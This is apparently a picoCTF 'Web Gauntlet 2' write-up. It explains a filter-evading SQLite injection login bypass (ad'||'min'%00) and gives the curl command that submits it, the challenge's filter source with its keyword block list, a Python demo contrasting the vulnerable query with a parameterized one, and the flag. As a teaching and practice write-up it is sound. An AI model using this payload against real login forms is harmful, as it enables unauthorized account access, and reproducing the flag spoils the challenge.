Web Gauntlet 2

Problem

This website looks familiar... Log in as admin
Site: http://mercury.picoctf.net:35178/
Filter: http://mercury.picoctf.net:35178/filter.php

Solution

  1.
    According to filter.php (visit it before logging in) the application filters out any input containing one of the following tokens: or and true false union like = > < ; -- /* */ admin.
  2.
    The query that solves this is ad'||'min'%00, which is similar to the final payload in the "Web Gauntlet" challenge from the PicoCTF 2020 Mini competition. In SQLite the || operator concatenates strings, so 'ad'||'min' evaluates to 'admin' inside the query while the literal admin never appears in the submitted input, which bypasses the admin filter. The %00 is a URL-encoded null byte: PHP decodes it into a real NUL when it populates $_POST, and SQLite stops parsing the query text at a NUL byte, so everything after it (including the password check) is discarded.
  3.
    A null byte cannot be typed directly into the website's form, so we use cURL instead: curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:35178/index.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" --output -. The --data string is sent as-is, so %00 reaches the server still URL-encoded and is decoded there. I copied the PHPSESSID cookie from the browser, which is important because the session is how the website knows to give us the flag when we go to /filter.php to get the flag.
  4.
    We can retrieve the flag with the browser that has the same PHPSESSID or with curl: curl http://mercury.picoctf.net:35178/filter.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" | grep picoCTF. Note that filter.php resets the session flag to 0 after showing its source once, so refreshing or fetching the page a second time requires logging in again.
  5.
    The code for the filter and the flag are shown in /filter.php when the login is bypassed:
    <?php
    session_start();
    if (!isset($_SESSION["winner2"])) {
        $_SESSION["winner2"] = 0;
    }
    $win = $_SESSION["winner2"];
    $view = ($_SERVER["PHP_SELF"] == "/filter.php");
    if ($win === 0) {
        $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
        if ($view) {
            echo "Filters: ".implode(" ", $filter)."<br/>";
        }
    } else if ($win === 1) {
        if ($view) {
            highlight_file("filter.php");
        }
        $_SESSION["winner2"] = 0; // <- Don't refresh!
    } else {
        $_SESSION["winner2"] = 0;
    }
    // picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}
    ?>
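
To see why the payload works end to end, here is an added Python reproduction of the bypass. This is my own code, not the challenge's PHP: it applies the filter list shown in filter.php, builds a string-concatenated login query, and contrasts it with a parameterized query. The users table and its rows are constructed, and the query shape (WHERE username='…' AND password='…'), case-insensitive matching, and filtering of both form fields are assumptions, since the page only shows the token list. Python's sqlite3 module refuses queries containing a NUL byte, so the truncation that SQLite performs when PHP hands it the raw bytes is reproduced explicitly in the code.

```python
import sqlite3
from urllib.parse import unquote

# Blocklist copied from the challenge's filter.php.
FILTER = ["or", "and", "true", "false", "union", "like",
          "=", ">", "<", ";", "--", "/*", "*/", "admin"]


def passes_filter(value: str) -> bool:
    """Return True if no blocked token occurs in value.

    Assumption: the challenge matches case-insensitively on the already
    URL-decoded field (the page only lists the tokens, not the matching code).
    """
    lowered = value.lower()
    return not any(token in lowered for token in FILTER)


def build_db() -> sqlite3.Connection:
    """Constructed sample users table; the challenge's real schema and data are unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "not-the-real-password"), ("guest", "guest")])
    return conn


def vulnerable_login(conn: sqlite3.Connection, user: str, password: str):
    """String-built login query in the shape the challenge is assumed to use.

    Returns the matched username row, or None.
    """
    if not (passes_filter(user) and passes_filter(password)):
        return None  # the challenge's filter would reject the request here
    sql = (f"SELECT username FROM users "
           f"WHERE username='{user}' AND password='{password}'")
    # PHP passes the raw bytes to SQLite, whose parser treats a NUL byte as the
    # end of the SQL text. Python's sqlite3 module instead raises ValueError on
    # an embedded NUL, so the truncation is reproduced explicitly here.
    sql = sql.split("\x00", 1)[0]
    return conn.execute(sql).fetchone()


def safe_login(conn: sqlite3.Connection, user: str, password: str):
    """Same lookup with bound parameters: the payload is just a literal string."""
    return conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (user, password),
    ).fetchone()


def run_payload(encoded_user: str = "ad'||'min'%00", password: str = "a"):
    """Decode the URL-encoded form value as PHP would and try both logins."""
    user = unquote(encoded_user)  # "%00" becomes a real NUL byte, as in $_POST
    conn = build_db()
    return {
        "passes_filter": passes_filter(user),
        "vulnerable": vulnerable_login(conn, user, password),
        "safe": safe_login(conn, user, password),
    }


if __name__ == "__main__":
    print(run_payload())                    # vulnerable query returns the admin row
    print(run_payload("admin", "x"))        # blocked by the filter
    print(run_payload("guest", "guest"))    # ordinary login still works
```

With the default payload the filter passes, the string-built query collapses to `SELECT username FROM users WHERE username='ad'||'min'` and returns the admin row, while the parameterized version returns nothing because the whole payload is compared as a literal username.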

Flag

picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}